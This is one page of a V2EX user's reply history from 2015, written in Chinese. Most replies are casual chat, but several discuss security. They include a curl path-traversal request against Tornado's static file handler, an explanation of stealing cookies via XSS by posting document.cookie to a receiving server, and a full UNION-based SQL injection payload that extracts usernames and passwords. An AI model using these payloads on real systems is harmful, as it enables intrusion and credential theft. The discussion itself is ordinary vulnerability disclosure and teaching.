V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  RIcter  ›  全部回复第 40 页 / 共 109 页
回复总数  2175
1 ... 36  37  38  39  40  41  42  43  44  45 ... 109  
2015 年 3 月 2 日
回复了 Cee 创建的主题 天黑以后 20150302 午夜俱乐部
ex 突然加我,感觉没话聊。
2015 年 3 月 2 日
回复了 RIcter 创建的主题 Python Tornado 框架某缺陷可能造成文件读取漏洞
@Livid
@evlos
@mywaiting
@kslr
不仅仅是 StaticFileHandler 的样子, settings 里的 static_file 也一样。
**大体**测试出来在 **Windows** 下可以读取文件,而且不是任意文件。
比如:

settings = {
"static_path": os.path.join(os.path.dirname(__file__), "xxx")
}

curl http://10.211.55.5:8888/static/static\\\\..\\..\\xxx.txt

文件名要和指定的目录一样,略鸡肋。不过我不确定 wooyun 上的漏洞和我是否一样 :(
2015 年 3 月 2 日
回复了 RIcter 创建的主题 Python Tornado 框架某缺陷可能造成文件读取漏洞
@mywaiting 我估计也是,但是不敢确定,稍微看一下代码好了
2015 年 3 月 1 日
回复了 gouwudang 创建的主题 程序员 现在用 perl 的人很难找了
哈哈哈哈哈哈我也是生物信息也是用 perl
2015 年 2 月 28 日
回复了 schezuk 创建的主题 MySQL 做一个匿名版(无注册论坛),求表结构优化意见
参考 pixmicat
2015 年 2 月 28 日
回复了 ljcarsenal 创建的主题 Python django 新加入图片无法访问的问题?
权限问题?
2015 年 2 月 28 日
回复了 TONYHEAD 创建的主题 分享发现 发现一个展示敏感内容的小技巧
你知道 exhentai 吗
2015 年 2 月 28 日
回复了 v0 创建的主题 Telegram 我是如何黑掉 Telegram 的"加密"
本地读内存还算“黑掉加密”...
Windows 还能直接在内存里 dump 出管理员密码呢..
2015 年 2 月 26 日
回复了 Dreista 创建的主题 天黑以后 20150227 午夜俱乐部
2015 年 2 月 26 日
回复了 johnny1996 创建的主题 V2EX 管理员能否添加站内私信以及自主删帖的功能
2015 年 2 月 25 日
回复了 Dreista 创建的主题 天黑以后 20150226 午夜俱乐部
今天很充实
_(:3
2015 年 2 月 25 日
回复了 jason52 创建的主题 分享创造 手把手写爬虫之第三弹--流量分析嗅探简介
黑阔神器 burpsuite _(:з」∠)_
2015 年 2 月 25 日
回复了 v2gba 创建的主题 信息安全 [求助]关于 SQL 注入
@MrGba2z 可能現在要邀請碼了吧⋯
2015 年 2 月 25 日
回复了 v2gba 创建的主题 信息安全 [求助]关于 SQL 注入
@MrGba2z 不要邀请码,随便打就行
2015 年 2 月 25 日
回复了 v2gba 创建的主题 信息安全 [求助]关于 SQL 注入
@RIcter s/远离/原理/g
2015 年 2 月 25 日
回复了 v2gba 创建的主题 信息安全 [求助]关于 SQL 注入
有一种平台叫做 XSS 平台,比如这个: http://xssnow.com/index.php
里面有现成可利用的 payload 可以获取 Cookie。

以至于远离,大抵是这样:

先获取 Cookie:document.cookie
然后转义,POST Cookie 的内容到一个接收端,接受端获取后存入数据库。
2015 年 2 月 25 日
回复了 v2gba 创建的主题 信息安全 [求助]关于 SQL 注入
@RIcter 忘记 limit 0,1 了,完整 payload:

-1' union select concat(surname, 0x3a, passwd) from users limit 0,1#
1 ... 36  37  38  39  40  41  42  43  44  45 ... 109  
关于   ·   帮助文档   ·   自助推广系统   ·   博客   ·   API   ·   FAQ   ·   Solana   ·   839 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 41ms · UTC 19:32 · PVG 03:32 · LAX 12:32 · JFK 15:32
♥ Do have faith in what you're doing.